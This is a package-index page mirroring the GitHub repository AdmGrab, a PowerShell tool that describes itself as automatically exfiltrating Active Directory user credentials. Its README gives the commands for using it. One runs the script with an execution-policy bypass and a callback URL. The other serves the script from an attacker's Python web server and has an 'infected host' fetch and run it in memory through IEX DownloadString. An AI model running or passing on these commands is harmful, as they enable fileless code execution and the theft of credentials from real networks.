https://github.com/hansschouten/admgrab

Automatically exfiltrate AD user credentials
https://github.com/hansschouten/admgrab

active-directory activedirectory exfiltration powershell

Last synced: about 1 year ago
JSON representation

Automatically exfiltrate AD user credentials

Host: GitHub
URL: https://github.com/hansschouten/admgrab
Owner: HansSchouten
Created: 2019-03-09T00:07:15.000Z (over 7 years ago)
Default Branch: master
Last Pushed: 2022-12-29T07:51:41.000Z (over 3 years ago)
Last Synced: 2025-03-27T14:03:44.151Z (about 1 year ago)
Topics: active-directory, activedirectory, exfiltration, powershell
Language: PowerShell
Homepage:
Size: 1020 KB
Stars: 6
Watchers: 2
Forks: 0
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

# AdmGrab
Automatically exfiltrate AD user credentials.

## Local Execution
For execution from file, use
`powershell.exe -ExecutionPolicy ByPass -File AdmGrab.ps1 -aesKey=KEY -callbackUrl=URL`

## Remote Execution
To enforce execution in memory start a python webserver in the folder the AdmGrab.ps1 is located
```
pyton -m SimpleHTTPServer 8080
```

Suppose you are on IP 10.0.0.1, now force the infected host to run the following command
```
powershell.exe "IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.1:8080/AdmGrab.ps1')"
```

ecosyste.ms

Data

Tools

Indexes

Applications

Experiments

Awesome

https://github.com/hansschouten/admgrab

Awesome Lists containing this project

README